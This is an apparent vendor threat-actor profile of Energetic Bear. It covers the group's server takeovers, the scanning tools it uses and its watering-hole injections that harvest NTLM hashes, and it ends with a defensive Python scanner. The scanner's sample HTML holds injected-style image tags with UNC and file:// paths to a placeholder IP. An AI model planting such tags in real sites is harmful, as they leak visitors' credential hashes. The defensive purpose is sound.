
Energetic Bear

Posted: October 8, 2019

The Energetic Bear is a threat actor that hijacks insufficiently secured servers to use as resources for launching attacks that may collect information or establish backdoor control. Its targets include a variety of industries and nations throughout the world, although the energy sector is of particular interest in its 'watering hole' attacks. Users can prevent attacks by monitoring their browser and server security protocols, and by using anti-malware products to block drive-by downloads and disinfect PCs.

Predators Energized by Others' Tools

Customized Trojans are the workhorses of many an espionage campaign, but there also is more than a little to be said for using third-party software. Instead of 'living off the land' with default Windows applications, or designing custom Trojans, the Energetic Bear is a threat actor that uses a range of third-party utilities. Its attacks are no less potent for abusing others' tools for corrupted purposes, and they tend toward the effective delivery of backdoor Trojans that cement long-term persistence.

Unlike most threat actors, the Energetic Bear displays few preferences in which entities it targets, and is in the business of taking over servers surreptitiously to use as resources for further attacks. Ukrainian tennis clubs, Turkish cosmetic manufacturers, and Russian cryptocurrency exchanges all are examples of targets that the Energetic Bear has a history of probing with third-party scanning utilities. Its successful watering hole attacks, by contrast, include victims in Russian real estate, a United Kingdom aerospace company, a Greek university and the US industrial energy sector.

Standard tactics for the Energetic Bear attacks involve searching for 'weak' servers with tools like the Nmap network analyzer, the Sqlmap penetration tester, or the Commix vulnerability searcher, among others. If they gain access to a server, they use it to host their tools or insert corrupted code to compromise the site's traffic, depending on the resources they have already established. Typically, malware analysts find the Energetic Bear's attacks inserting randomly-named PNG requests into server code, which sends visitors' browsers on a wild goose chase for an image file that is not actually hosted. This request lets the Energetic Bear harvest the user name, the domain name, the IP address and an NTLM hash of the visitor's password.

Cutting Off the Energy Source of a Server Carnivore

While the bear that is the Energetic Bear's namesake is an omnivore, this threat actor could be called a 'server-vore,' due to its preference for taking over servers near-indiscriminately and for multiple purposes. However, malware experts do narrow down some of the Energetic Bear's activities to ones that suggest backdoor establishment is a priority. These hackers use remote admin scripts to control PCs, as well as a Web shell that can manage system settings and file operations.

The Energetic Bear's strategies likely reflect an effort to avoid attribution and identification by the cyber-security industry. Customized or rarely-deployed Trojans are telltale signs of various threat actors, such as APT32 or OceanLotus. Third-party tools like Dirsearch or Wpscan are suitable for the needs of many hackers' organizations, including state-sponsored and independent ones. However, most infections originating from the Energetic Bear require some negligence from the server's administration or other users.

Server admins can scan their code with appropriate utilities to identify corrupted code and references to Black Hat domains. They also should avoid using brute-forcible passwords, leaving ports open, or enabling RDP with overly loose settings. Traditional anti-malware services with browser-protecting features can block attempted infections when Web surfers load the Energetic Bear's watering hole sites, and disinfect computers, as usual.
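A defender-side check that ties together the injected PNG-request pattern described earlier and the code-scanning advice above. This is an added example, not code from the original page or from any vendor; it assumes the injected references are `<img>` tags whose `src` points to a `file://` or UNC path, or to an untrusted external host with a random-looking PNG name, and the sample HTML, the IP address and the trusted-host list are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed sample of a page as an admin might find it after an injection:
# one legitimate image, one external PNG with a random-looking name, and two
# references in the file:// / UNC forms that can trigger NTLM authentication.
SAMPLE_HTML = """
<html><body>
<img src="/static/logo.png" alt="logo">
<img src="http://203.0.113.7/f3a9c1d2e7b4.png" width="1" height="1">
<img src="file://203.0.113.7/share/x.png">
<img src="\\\\203.0.113.7\\pub\\img.png">
</body></html>
"""

# Hosts the site legitimately loads images from (constructed placeholder list).
TRUSTED_HOSTS = {"www.example-victim.org", "cdn.example-victim.org"}
IMG_SRC_RE = re.compile(r'<img\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)
RANDOM_NAME_RE = re.compile(r'^[0-9a-f]{8,}\.png$', re.I)


def classify_src(src, trusted_hosts=TRUSTED_HOSTS):
    """Return a reason string if the image source looks injected, else None."""
    # UNC and file: sources make Windows browsers authenticate to a remote host.
    if src.startswith("\\\\") or src.lower().startswith("file:"):
        return "unc-or-file-scheme"
    parsed = urlparse(src)
    # Absolute or protocol-relative URL pointing off-site for a PNG.
    if parsed.netloc and parsed.scheme in ("http", "https", ""):
        host = parsed.hostname or ""
        name = parsed.path.rsplit("/", 1)[-1]
        if host not in trusted_hosts and name.lower().endswith(".png"):
            return "external-random-png" if RANDOM_NAME_RE.match(name) else "external-png"
    return None


def scan_html(html, trusted_hosts=TRUSTED_HOSTS):
    """Return a list of (src, reason) pairs for every suspicious <img> source."""
    findings = []
    for match in IMG_SRC_RE.finditer(html):
        src = match.group(1)
        reason = classify_src(src, trusted_hosts)
        if reason:
            findings.append((src, reason))
    return findings


if __name__ == "__main__":
    for src, reason in scan_html(SAMPLE_HTML):
        print(f"{reason:22s} {src}")
```

Run it over the served HTML (or the templates on disk) and review every hit against the site's known image hosts; a one-pixel PNG fetched from an address the site never used before is the kind of reference the text describes.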

Putting the bulk of the programming work onto another person, even an innocent one, is an easy way of getting access to invasive tools at a low personal cost. The Energetic Bear team is nonetheless a predator at the top of its server-eating food chain, despite its dependence on strangers' tools.
